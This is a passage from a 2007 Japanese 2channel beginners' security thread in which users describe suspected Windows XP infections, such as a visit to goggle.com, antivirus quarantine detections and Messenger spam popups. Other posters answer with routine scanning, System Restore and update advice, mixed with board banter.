こいつリカバリもわかんないってw
多分、連れに教えられてP2Pやったノーガード戦法(セキュリティ知らず)馬鹿じゃね
アホそうだから「タダ」に釣られたんだよ

425 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:14:00
以後スルーで

426 : ◆N9P3SuvBPo :2007/01/21(日) 22:15:24
次の質問者どうぞー

427 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:26:52
すいません、15分ほど前にうっかりgoggle.comを開いてしまいました
【使用OS】 ウィンドウズXP home edition
【MicrosoftUpdate】 ここ1、2ヶ月ぐらい?はしてないです
【使用セキュリティソフト】 ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新の状態です
【ルータの有無】 ないです

すいません、さっきうっかり他のスレでgoggle.comを開いてしまい、10秒ほどしてそのウィンドウを閉じました(IEで開きました)
ポップアップはノートンにブロックされたので出ませんでした
ウィルス検知の反応も全くありませんでした
変わった症状も今のところありません
ですが、そのスレでは、検知されなくてもたくさんのウイルスやスパイウェアなどが入っていると皆がレスしているし
調べてみたところかなり凶悪なサイトのようで、ビビッています
ノートンは反応しないし、私は何をすればいいのでしょうか?

428 : ◆N9P3SuvBPo :2007/01/21(日) 22:41:59
>427
俺もさっき、そこに行って見たよ。
画面中央にこんな文字が無かった?

>We're sorry!

>This offer is not available in your area.
>You will be redirected shortly.

どうもこのgoggleってサイトにはIframeタグが使われてるようだし…
ノートンがブロックしていたとは言え、MUは1、2ヶ月くらいしてないって言ってるからなー
念の為にカスペルスキーオンラインスキャンでもして、ウイルスが検出
されなければしばらく様子見でいいんじゃないでしょうか。

カスペルスキーオンラインスキャン
ttp://www.kaspersky.co.jp/

429 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:52:22
>>427
心配ならF8を起動時に押してセーフモードでもう一回フルスキャン
goggle.comは普通に有名だぞ。

後クッキーもついでに削除もしとけ
IE→ツール→インターネットオプション→Cookieの削除
コンパネ→インターネットオプション→Cookieの削除

430 :名無しさん@お腹いっぱい。:2007/01/21(日) 22:58:31
>>428
いまwindows updateに行ってきたら、一応
「優先度の高い更新プログラム
お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
追加で選択できる更新プログラムの有無を確認するには、ホーム ページに戻って [カスタム] をクリックします。」
というふうには表示されました。
そのような文字があったかは覚えてないです;どういう意味なんですか?
カスペルスキースキャンしてみます。ありがとうございます。

>>429
クッキー削除しときました。goggleは今日初めて知りました・・・。
カスペルスキーオンラインスキャンした後で、セーフモードでスキャンしてみます。
セーフモードで立ち上げて、後は普通どおりスキャンすればいいんですよね?

431 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:01:15
あ、オンラインスキャンするときって、ノートンは切っておいたほうがいいんでしょうか?そのままでもいいですか?

432 : ◆N9P3SuvBPo :2007/01/21(日) 23:01:36
>430
>お使いのコンピュータに該当する優先度の高い更新プログラムは存在しません。
これは重要な更新が全てインストール済みですよって意味。
[カスタム]についてはちと…

433 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:05:18
>>432
じゃあ、とりあえずアップデートは最新のものだったってことですね。

434 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:13:53
>>430
YES
常時接続ならLANケーブルも抜いといていいよ。心配だったら

435 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:20:24
>>434
セーフモードでスキャンするときは、LANケーブル抜いときます。
心配すぎる・・・さっきまでは、そこそこ重要なデータもぜんぶ消えていいから即効でリカバリしようと思ってました・・・

436 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:25:59
>>432
カスペルスキーのスキャン、スキャン対象を「重要な領域」と「マイコンピュータ」どちらにすればいいんでしょうか?

437 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:29:02
両方やればいいじゃない
マイコンピュータは時間掛かると思うけど

438 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:29:27
そうします

439 : ◆N9P3SuvBPo :2007/01/21(日) 23:31:52
このgoggleってサイト、もう一度だけIEで行って見たけど、
俺の環境ではトップページのみ開いてお終いでしたね。
アドレスにgoggle.netと入力してページを移動すると
自動的にgoggle.comにリダイレクトされちゃうからな。

IEの設定が運命を分けているのかも

>437
フォローさんくす

440 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:36:49
>>435
リカバリや修理は最終手段だよ。しなくてもいい例もあるし。しなければならない例だって
ある。人によってはマメにバックアップを取って、
わざと、レジストリ掃除の意味を込めて、リカバリをする人もいるよ。
まぁ・・また何かあったら、来てくださいな!

441 :名無しさん@お腹いっぱい。:2007/01/21(日) 23:47:59
>>439
ちょっとおっしゃられている意味がわからないのですが、
自分は、goggle.comってアドレスのハイパーリンクから飛びました
まぁとりあえず、カスペルのオンラインスキャンと、セーフモードでのノートンのスキャンをしてみて、しばらく様子をみてみます。
ありがとうございました!

>>440
わかりました。ありがとうございました!

442 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:44:18
カスペルスキーのオンラインスキャンをしたら、Exploit.HTML.Mhtというウイルスが、Doccuments and Settingsの中のApplication Dataの中の Norton Antivirus の中のQuaran tineというとこの中から検出されたのですが、これはどういうことなんでしょうか・・・

443 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:45:04
ノートンが隔離したファイル

444 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:46:22
あ、じゃあ特に放置でいいってことですか?

445 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:47:31
>>442
気になるならノートンアンチウィルスのレポートのところで 
検疫と復元を表示→問題なさそうだったら削除 でスキャンしてもでなくなる

446 :名無しさん@お腹いっぱい。:2007/01/22(月) 00:48:51
わかりました。ありがとうございます。

447 :395:2007/01/22(月) 00:52:55
とりあえずKNOPPIXで起動したものの
どうすればいいの?
レジスト復旧しようにも、保存したのが見付からない
ノートンか他のやつで保存したはず・・・たぶん
色々したが、なにしたらいいか、もう分かんね・・・・

まあ、色々検索して、回復コンソールで、レジスト回復できるみたいなんだか
起動ディスク作るのに、フロッピー6枚とか、もしくはCDに焼けとか
邪魔くさいよ・・・って言ってる場合じゃないんだけどね
消したレジスト戻したいだけなのに・・・・

で気になったんだが、レジスト回復するとどうなるの?
XPの設定が初期化されるだけ?
インストしてるソフトに影響は有るの?
ウイルスは残ったまま?
エロイ人、教えて

長文スマソ・・・・

448 : ◆N9P3SuvBPo :2007/01/22(月) 01:09:34
>447
>起動ディスク作るのに、フロッピー6枚とか
これは確かに邪魔くさい。

レジストリのバックアップ、どこに保存したか覚えてないの?
あと、何て名前で保存したかとか?

>レジスト回復するとどうなるの?
レジストリの設定が元通りになる。
つまりウイルスが書きこんだレジストリ領域も。
でも今は回復させることを考えないと
起動できるようになったら、
もう一度駆除作業をおこなってやればいいんじゃないかな?

449 :395:2007/01/22(月) 07:40:39
やっとオワタ・・・・
何とか復旧完了した・・・・・・

昨日の状態に・・・・?
ウイルスも消えてない、アンストしてたソフトが有る
どうみても昨日の状態・・・
しかも(c:\windows stup_tmp2,#32)ってエラーが出るし
これは次の起動で直るかもしれんが

今からセーフモードでノートンフルスキャンしてくる
もしかしたらまた、世話になるかも・・・・orz

450 :名無しさん@お腹いっぱい。:2007/01/22(月) 09:07:46
>>449

451 :名無しさん@お腹いっぱい。:2007/01/22(月) 13:40:51
【使用OS】 WindowsXP Home SP1
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 カスペルスキーアンチウィルス5
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Virus.Win32.Nsag.a ・ system32\WinInet.dll
【どんな症状が出るか】 上下の転送もなく、これといって目立った症状はありません。
【症状が出る前に何をやったか】 1日前にyoutubeでの動画閲覧をした後、次の日に再起動をした。
【症状を解決しようとどのような処置を取ったか】
WinInet.dllを削除したが、エラーが多発したためシステムの復元をし、現在に至ります。
【その他の質問】
ググった結果を元にレジストリを見ても問題はなく、system32フォルダ、単体でウィルススキャンをしても
ウィルスとして発見されませんでしたが、これは問題ないと言う判断をして良いものでしょうか

452 : ◆N9P3SuvBPo :2007/01/22(月) 17:38:31
>451
>【使用OS】 WindowsXP Home SP1
解決後にSP2にすることをお奨めします。

>【スキャンの結果(検出場所)】c:\windows\system32\wininet.dll
このファイルは正規のファイルっすよ。

>これは問題ないと言う判断をして良いものでしょうか
今のところ症状が無いのなら様子見でいいんじゃないでしょうか?
何か症状が出たら執念で解決するとか。

453 :395:2007/01/22(月) 18:38:08
もう疲れたので、リカバリしてくるよ・・・・
とりあえず、必要なデーターを外付けに移してる所
終わったら、リカバリするよ

流石に5日もウイルスと格闘してるとね・・・・・
胃も痛くなるし
じゃあまた、ウイルスに引っかかったら、またお世話になるかも・・・・

454 :名無しさん@お腹いっぱい。:2007/01/22(月) 18:58:43
>>451
語検出だってさ
http://www.just-kaspersky.jp/support/info/20070122.html

455 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:11:30
>>452
やはりSP2の方がいいのですか・・・
出た当時の悪いイメージが取れず踏み切れずにいます

>>454
ありがとうございます。
焦って質問しすぎたようです・・・

456 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:20:39
出た当時の悪いイメージっていつのはなししてんだぁ

457 : ◆N9P3SuvBPo :2007/01/22(月) 23:21:50
>455
ああ、たしかに当初は不具合(ネットに繋げなくなるとか)があったらしいね。
俺はそのとき、XPに興味無かったんで。あ、別にXPに欲情してるわけじゃないぞ。

しかし誤検出は勘弁して欲しいですよね。

458 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:24:08
>455
確かに最悪だったけど、今は絶対SP2にすべき

459 :名無しさん@お腹いっぱい。:2007/01/22(月) 23:30:29
sp3っていつになるんだろ
今年は無理かな

460 :名無しさん@お腹いっぱい。:2007/01/23(火) 04:20:42
前にも違うスレで質問しましたが良くわからなかったので
リカバリ前に確認させていただきます。
よろしくお願いいたします。

【使用OS】
windows XP MCE2005
【MicrosoftUpdate】
○行っています。(と思います。止めた覚えはありません)
【使用セキュリティソフト】
○ウイルスセキュリティーゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】
○最新です。
【ルータの有無】
○有ります。(無線LAN)
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
○Trojan.Win32.KillFiles.ki
【どんな症状が出るか】
○動画ファイルが画像に書き換えられる。
○exeファイルが消去される。
【症状が出る前に何をやったか】
○不明なファイル(スクリーンセイバー)をDL実行しました。
【症状を解決しようとどのような処置を取ったか】
○VSでのウイルススキャン(検知なし)
○カスペルスキーでのオンラインスキャン
【その他の質問】
○対応しないといけない事はありますか?
○個人情報は(ファイルやデータ)は抜かれてるのでしょうか?
○リカバリーで直せますか?

よろしくお願いいたします。


461 :名無しさん@お腹いっぱい。:2007/01/23(火) 08:05:11

■有害なマルウェア警報■

1月23日時点では検出できるセキュリティソフトが少ない悪質Rootkitが出現しました。
現時点では検出不能の”NOD32”のような製品をお使いのユーザーは、特に注意して下さい。

・マイクロソフトWindows Defender検出名:VirTool:WinNT/FURootkit.F
・BitDefender検出名:Trojan.Rootkit.Agent.AE
・kaspersky検出名:Rootkit.Win32.Agent.ab


(ソース:検出可能なセキュリティソフト一覧)
http://www.virustotal.com/vt/en/resultadox?8b0a57dcc040a10869f6791de1f7ad2b



462 :名無しさん@お腹いっぱい。:2007/01/23(火) 12:30:52
>>461
リンク死んでますよ・・・



463 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:28:26
>>461
いまリンクが駄目なんで証拠SS画像うpした。
http://vista.o0o0.jp/img/vi6953276258.jpg

464 :名無しさん@お腹いっぱい。:2007/01/23(火) 15:53:34
AVGがだめでもBitDefenderがあるからなんとかなるかな。

465 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:01:24
>>463
なんでリンク先死んでるの?


466 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:21:26
>>465
マルチ質問乙w

セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/

467 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:22:16
セキュリティ初心者質問スレッドpart80
http://pc10.2ch.net/test/read.cgi/sec/1167252179/
974 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/01/23(火) 16:03:15
>>973
なんでリンク先死んでるの?

468 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:27:33
>>466
NOD厨が血相変えて突っ込みを入れているっぽい(w

NOD32アンチウィルス Part41
357 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:05:01
>>355
なんでリンク先死んでるの?

一番いいセキュリティソフトはなんだ!!Part21
238 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:00:50
>>236
なんでリンク先死んでるの?

469 :名無しさん@お腹いっぱい。:2007/01/23(火) 16:49:22
>>466-468
いやNOD厨じゃないが・・・

470 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:13:19
          ゝ  /'  '\    :::::::::::'
           . -・=-, 、-・=-  ::::::::::;' 
           |  .,ノ(・ ・ ( ⌒  ::6) <いやNOD厨じゃないが・・・♪  
           .l ┃トョヨコイ┃  .ソ  
           ヽ┃`ニ'´ ┃ ,.i-、 

471 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:18:02
ワラタ

472 :名無しさん@お腹いっぱい。:2007/01/23(火) 23:27:45
ノートン使ってて、いきなりアウトブレーク警告っ表示が出たんですけど
これってどういう意味なんですか?
別に自分のPCからウイルスが見つかったってわけではないんですか?

473 :名無しさん@お腹いっぱい。:2007/01/24(水) 00:38:46
>>472
正規ユーザなら説明書に書いてあるだろ

474 :名無しさん@お腹いっぱい。:2007/01/24(水) 01:14:42
なんかウェブサイトがとつぜん
YouTubeと描かれた小さい画像で埋まることがある

ウィルスですかこれ?

475 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:12:10
なんだったの?
このマルチ>>461

476 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:29:23
>>475
http://vista.o0o0.jp/img/vi6953276258.jpg

477 :名無しさん@お腹いっぱい。:2007/01/24(水) 16:35:08
>>475
>>476
読んで字の如く、NOD32などが検出できないRootkitがありましたということですな。

478 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:21:29
たまに電源から異音がなるんですが、
これはウィルスなんでしょうか?

OS:windows2000

479 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:31:06
>478
電源がへたってるのかな
掃除してみたら

480 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:36:16
>>478
大雑把すぎ
やれることもっとあるだろ
それだけで原因特定できる奴は超を越える上級者でもいない

481 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:37:56
電源切ってから5分後勝手に立ち上がってきたんですがウイルスでしょか?ちなみにxpです

482 :478:2007/01/24(水) 20:38:02
電源は変えたばかりです・・・。
一応NOD32でウィルススキャンしたんですが、
ウィルスにやられままなんじゃないかとすごい不安です。

483 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:45:12
>>481
たんなるPCの不調


484 :名無しさん@お腹いっぱい。:2007/01/24(水) 20:48:37
>482
それなら電源が不良品だったんじゃないの

485 : ◆N9P3SuvBPo :2007/01/24(水) 20:54:51
>482
異音の原因を執念で突き止めろ

486 :657:2007/01/24(水) 21:43:33
>>481
電源不良 もしくはネットワークからのブート許可する設定になってるだけ
なんでもウイルスのせいにするな

487 :名無しさん@お腹いっぱい。:2007/01/24(水) 22:07:41
IEキャッシュフォルダのアクセスを拒否しとけばセキュ穴つかれて.exe自動実行されるサイト対策になると思うんだけど どう?

488 :名無しさん@お腹いっぱい。:2007/01/24(水) 23:33:37
           ∩_
           〈〈〈 ヽ
          〈⊃  }
   ∩___∩  |   |
   | ノ      ヽ !   !
  /  ●   ● |  /
  |    ( _●_)  ミ/ こいつ最高にアホ
 彡、   |∪|  /
/ __  ヽノ /
(___)   /

489 :名無しさん@お腹いっぱい。:2007/01/25(木) 02:06:20
>>486
だれだよ

490 :名無しさん@お腹いっぱい。:2007/01/25(木) 08:19:14
>>461
>>463
また"NOD32"などで、まだ検出できないウイルスが出現した('A`)
ちゃんと検出できている製品もあるのに。

代表的な検出名:PoisonIvy.j(バックドアの一種)
http://vista.o0o0.jp/img/vi6966723460.jpg
http://www.virustotal.com/

491 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:34:17
PC起動したらデスクトップ画面で背景だけ表示されて、アイコンやタスクバーが表示されません…。
ウイルスでしょうか?

492 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:39:37
>>491
前回の起動時にやったこととか現状になる原因の思い当たる節とかも書かないと解決の指針が立たない

493 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:46:05
【使用OS】  「」
【MicrosoftUpdateの状態】  「」 
【使用セキュリティソフトとバージョン】  「」
【セキュリティソフトの定義ファイルは最新の状態であるか】  「」 
【スパイウェア対策ソフト】  「」 
【ルータの有無】  「」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】  「」
【どんな症状が出るか】  「」
【症状が出る前に何をやったか】  「」
【症状を解決しようとどのような処置を取ったか】  「」
【その他の質問】  「」


494 :名無しさん@お腹いっぱい。:2007/01/25(木) 11:55:24
>>491
電源入れてF8連打で前回正常に起動したときの設定で起動する を選択してもそうなる?
できなかったらセーフモードで起動

495 :名無しさん@お腹いっぱい。:2007/01/25(木) 19:06:56
>>491
Ctr+Alt+Deleteでタスクマネージャ起動
ファイル→新しいタスクの実行→ explorer と打ち込む→ok

復活しなければなんかで上書きされてる可能性大

496 : ◆N9P3SuvBPo :2007/01/25(木) 20:26:33
>494-495
いまだに音沙汰無しということは、リカバリでもしてるんだろうか?

>491
セーフモードとコマンドプロンプトで起動
%systemroot%\system32\restore\rstrui.exe

システムの復元で戻す

497 :491:2007/01/26(金) 00:47:30
>>494-496
返信ありがとうございます。
>>494さんの言うとおりセーフモードで起動しましたがインターネットが開けなかったり、ウイルスセキュリティソフトのウイルス自動検知なとがOFFになっていますが、やはりこれはウイルスの仕業でしょうか?
前回の正常起動時にP2Pソフトを使用したのが原因だと思います。
明日、>>495さん、>>496さんのやり方をやってみようと思います。

携帯から長々とすいませんでしたm(_ _)m

498 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:02:12
いきなり画面の背景がエメラルド色になってしまいました。マウスの矢印もです。
突然元の白に戻る事もあるのですが今までなかったのに何でか分かる方いませんか??
例えば2Cなどを見てその影響でなったりしますか?


499 :名無しさん@お腹いっぱい。:2007/01/26(金) 01:24:58
いまC:\WINDOWS\system32\acs.exeが韓国に繋ごうとしたのでjeticoで不許可にしたのですがウイルスでしょうか?
ウイルストータルで検索しても異常なし、プロパティに会社名も何も無い、富士通のPCではありません。

500 :名無しさん@お腹いっぱい。:2007/01/26(金) 09:47:00
>>476
>>490

ケンタイ、クレヨッ!!

501 :名無しさん@お腹いっぱい。:2007/01/26(金) 10:39:21
>>498
モニターの寿命では?

502 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:02:09
↑4年くらい前に買った富士通のノートPCであまり使ってなく、
最近は週に1回使うか使わないかなんですが寿命なんですか?
ウィルスではないですか?どうすれば直りますかね

503 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:09:34
ノートPCではよくある事
外部モニタに繋げば分かる

504 :StONe:2007/01/26(金) 20:42:23
hi


505 :名無しさん@お腹いっぱい。:2007/01/26(金) 20:54:09
korean?


506 :名無しさん@お腹いっぱい。:2007/01/26(金) 23:29:17
〉〉503 ウィルスではないのでよね?修理出すか買い替えないといけないのですか?近所なども関係ないですよね

507 :名無しさん@お腹いっぱい。:2007/01/27(土) 16:32:21
ウイルスチャイサーで全てのドライブにウイルスの手動検査を行いました。
検査が終わりウイルスは検出されませんでしたってメッセージがでるんですけど。
他のところに下のような表示がでます。


ファイル名             ウイルス名    状態
C:\quarantine\101-200[1].VirVBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir   VBS/LoveLetter@MM移動 (駆除失敗)
C:\quarantine\1155374931[1].Vir.0  VBS/LoveLetter@MM移動 (駆除失敗)

どうすればよいでしょうか?

508 :名無しさん@お腹いっぱい。:2007/01/27(土) 17:14:53
>>507
つquarantine

509 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:07:38
>>508どういうことなんでしょうか??

510 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:10:13
辞書でひけよ

511 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:11:29
隔離フォルダ
ノートンでも使ってたか?

512 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:12:53
えっと、クエンティン・タランティーノであってますか?

513 :名無しさん@お腹いっぱい。:2007/01/27(土) 18:29:48
普通に使ってただけですが
私はノートパソコンで飛ばした電波をキャッチして
インターネットを」やっていますが

514 :513:2007/01/27(土) 19:02:29
無償ウィルス駆除ツールで駆除をおこなったら
ウイルスにかかっていないというメッセージがでました。
もうわけがわかりません。

参考までに 自分はインターネットをするためだけにパソコンを使っています。
自分のファイルなどはありませんし
メールの機能も一切使っていません。
いくらウイルスにかかっても失う物はなにもないって状態です。

まあそれでも他のユーザーの迷惑になるんとおもうのでウイルスは駆除したいです。

515 :513:2007/01/27(土) 19:09:14
次から次えとすいません
お気に入りに入れた覚えのないものがありました
デスクトップとあって中身は下記のとうりです

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
LocalizedResourceName=@shell32.dll,-12693


516 :名無しさん@お腹いっぱい。:2007/01/27(土) 19:17:31
596 名前:名無し~3.EXE[] 投稿日:2007/01/27(土) 09:32:27 ID:Kft9BwlP
IE6のお気に入りに、ファイルの種類が「構成設定」
というファイルができていました。
名前はdesktopで、開けて見ると

[.ShellClassInfo]
IconFile=%SystemRoot%\system32\shell32.dll
IconIndex=-173
LocalizedResourceName=@shell32.dll,-12693

と書いてあったんですが、何でしょうか・・・
削除しようかと思ったんですが、
「削除すると危ないよ」みたいな警告が出ました。

ウイルスとかならセキュリティ板で聞いた方が良いでしょうか?

597 名前:名無し~3.EXE[] 投稿日:2007/01/27(土) 09:39:35 ID:9XILkebr
>>596
それはお気に入りのの★印フォルダのアイコンを指定してるファイル。ウイルスじゃない


598 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 09:39:59 ID:yxTSfWWZ
お気に入りフォルダのsystem.iniだなw
問題ないよ

517 :名無しさん@お腹いっぱい。:2007/01/27(土) 19:19:14
599 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 09:48:31 ID:Kft9BwlP
>>597-598
ということは大丈夫なんですね。
ありがとうございます。よかったです。
再インストールしないといけないのかと思って
少しテンションが下がっていました・・。

ところで、それでも削除するとまずいんですよね?
お気に入りボタンを押すと出てくるんですが、
邪魔なのでどこかに移動したいのですが
どこへ移動させれば良いでしょうか?
とりあえず、お気に入りリストから
「デスクトップ」の画面まで異動させてみました。

601 名前:名無し~3.EXE[sage] 投稿日:2007/01/27(土) 10:05:52 ID:9XILkebr
>>599
普通は隠しファイルになってるはずだから、隠しファイルを表示しない設定にすればいいし。
どうしても気になるんだったら削除してもお気に入りフォルダのアイコンが
標準のアイコンに変わるだけだから消しても問題ないよ

518 :名無しさん@お腹いっぱい。:2007/01/27(土) 22:30:37
↑なに、これ?

519 :名無しさん@お腹いっぱい。:2007/01/27(土) 22:57:49
>>518
マルチってことだろ
しかも朝の9時には解決レスもらってるという

520 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:00:20
こんばんは
ウイルス来ました・・W32.Myzor.FKってやつなんですけど・・・・
よくわかりません・・・・・・
差し支えなければ、被害と駆除方法を・・・・
お願いします!

521 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:05:32
>520
>1

522 :520 :2007/01/27(土) 23:11:08
すみません・・・・・
【使用OS】 ウィンドウズXP
【MicrosoftUpdate】
【使用セキュリティソフト】 ウイルスセキュリティゼロ
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新です。
【ルータの有無】 ありません
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】していないのですが・・
【どんな症状が出るか】 エクスプローラーexeを終了しますと出る
【症状が出る前に何をやったか】 何も・・・
【症状を解決しようとどのような処置を取ったか】 とりあえずアンチを
【その他の質問】 インターネット起動してHPがhttp://awarninglist.com/になります

わからない事があってごめんさい・・・・

523 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:14:11
>>522
SafeModeで起動後システムの復元で戻って
スパイウェアチェックでどうだろう?

524 :522:2007/01/27(土) 23:16:27
>>523
ご返答ありがつございます!
すみません、手順を教えてください・・・

525 :名無しさん@お腹いっぱい。:2007/01/27(土) 23:35:56
>>524
SafeModeで起動→システムの復元→SafeModeで起動
→スパイウェアチェック→Hitしたら削除→再起動

526 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:25:02
Temp フォルダに 、 「 hsperfdata ユーザー名 」 というフォルダが たまに作られるんですけどウイルスにかかってますか ?
hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。

527 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:30:21
セキュリティ初心者質問スレッドpart70
2006 / 05 / 10 ( 水 ) 17 : 27 : 02:
Temp フォルダに 、 「 hsperfdata ユーザー名 」 というフォルダが たまに作られるんですけどウイルスにかかってますか ?
... hsperfdata で検索したら 、 英語ページばっかりでよくわかりませんでした 。 ...



528 :524:2007/01/28(日) 00:31:07
ありがとうございました!直りました!

529 :名無しさん@お腹いっぱい。:2007/01/28(日) 00:39:15
>528
パスワードを変えておいたほうが吉かも

530 :507:2007/01/28(日) 01:01:30
>>507に答えてください

531 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:11:43
ファイルがすべてpugyaaaになるのはスレ違い?
ググればヒットするかと思ったが症例が少ないのだろうか…。

532 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:18:44
>>530
隔離・検疫などにあるのを削除

533 :530:2007/01/28(日) 02:26:04
>>532
それすらよくわからないど素人です・・
説明して頂けたら幸いです。

534 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:27:45
>>533
セキュリティソフトは?

535 :名無しさん@お腹いっぱい。:2007/01/28(日) 02:55:18
>>533
Cドライブにあるqurantineフォルダ開いて選択して削除

536 :530:2007/01/28(日) 03:50:04
>>535
Cドライブすらわからいorz
超ど素人に1から説明するつもりで
レスしてくれたらありがたいです。

537 :530:2007/01/28(日) 03:54:01
>>534セキュリティーソフトにはウイルスバスターがあります。
その後にウイルスチャイサーインストールしました。

538 :名無しさん@お腹いっぱい。:2007/01/28(日) 04:13:37
>>536 
簡単に最初からな
windowsキー>マイコンピューター>ローカルディスク(C:)をクリック

本当に大丈夫か?
それからPCはもうちょっと馴れような。

後、俺は535とは別人

539 :530:2007/01/28(日) 04:42:41
>>538おおっ!!親切な人ありがとう。

540 :530:2007/01/28(日) 04:48:49
>>538キレイな体になれました。
こんな親切に教えてくれる人がいるとは思いませんでした。
ありがとうございました。

541 :名無しさん@お腹いっぱい。:2007/01/28(日) 06:17:38
先生質問です!
ライムでエロ動画を落としたのですが、削除できないファイルがあります。右クリックしても削除が出てこないσ(^◇^;)
ウイルスバスターでウイルス検索かけてもhitしません。先生なら、どーしますか?

542 :531:2007/01/28(日) 06:42:36
自己解決。過去ログ39もしくはダウソ板か。

543 :名無しさん@お腹いっぱい。:2007/01/28(日) 10:53:08
すみません。本当に素人です。

ウィンドウズのXPを使用。
ウイルス対策は、 スパイボット、 無料バージョンを使用しています。

2日前からモニター画面上にメッセンジャーから
「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
などのメッセージが頻繁に6枚くらい出続けます。
メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
そして10分ほどでまた同じようなメッセージが出ます。

ウイルスに感染したのかと思い、仕方なくPCをフォーマットし、
スパイボット、スパイウエアボット、AVAS? を全て無料バージョンで入れましたが
状況は変わりません。

IPアドレスが出回ってると、もうどうしようもないのでしょうか?
あと、メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?


544 :名無しさん@お腹いっぱい。:2007/01/28(日) 10:59:06
【使用OS】
【MicrosoftUpdate】
【使用セキュリティソフト】
【セキュリティソフトの定義ファイルは最新の状態であるか】
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
【どんな症状が出るか】
【症状が出る前に何をやったか】
【症状を解決しようとどのような処置を取ったか】
【その他の質問】

545 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:21:46
>>543 です。

>>544
【使用OS】  ウィンドウズのXP プロバイダーはヤフーで8Mです。
【MicrosoftUpdate】  意味がわかりません。
【使用セキュリティソフト】 当初はスパイボットの無料
【セキュリティソフトの定義ファイルは最新の状態であるか】 意味がわかりませんが
    スパイポッドは2日に一回アップデータしてウイルスチェックしていました。
【ルータの有無】 意味がわかりませんが無いと思います。
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 特になし。
【どんな症状が出るか】 2日前からモニター画面上にメッセンジャーから
  「アテンション!このメッセージを受け取ったなら貴方のIPアドレスは晒されている?<英語>」「セキュリティーからアラートへのお知らせ」「HOT SEXY FREE〜」
  などのメッセージが頻繁に6枚くらい出続けます。
  メッセージは右上の×を押せば消せるのですが警告音が鳴ります。
  そして10分ほどでまた同じようなメッセージが出ます
【症状が出る前に何をやったか】 2チャンの閲覧・ネットでの通販(ニッセン等の一般的な所)くらい。
【症状を解決しようとどのような処置を取ったか】  スパイボットでウイルスチェック→ウイルス検出できないのでフォーマットしウインドウズ入れなおす。
  スパイポッドの他、スパイウエアポッド、AVA?(どれも無料)を入れ、全部でウイルスの検索チェックするが出ない。

【その他の質問】
メールのやり取りから通販で購入したものや、自分の住所もばれてしまった可能性はあるでしょうか?

546 :名無しさん@お腹いっぱい。:2007/01/28(日) 11:31:30
>>545です。

すみません。
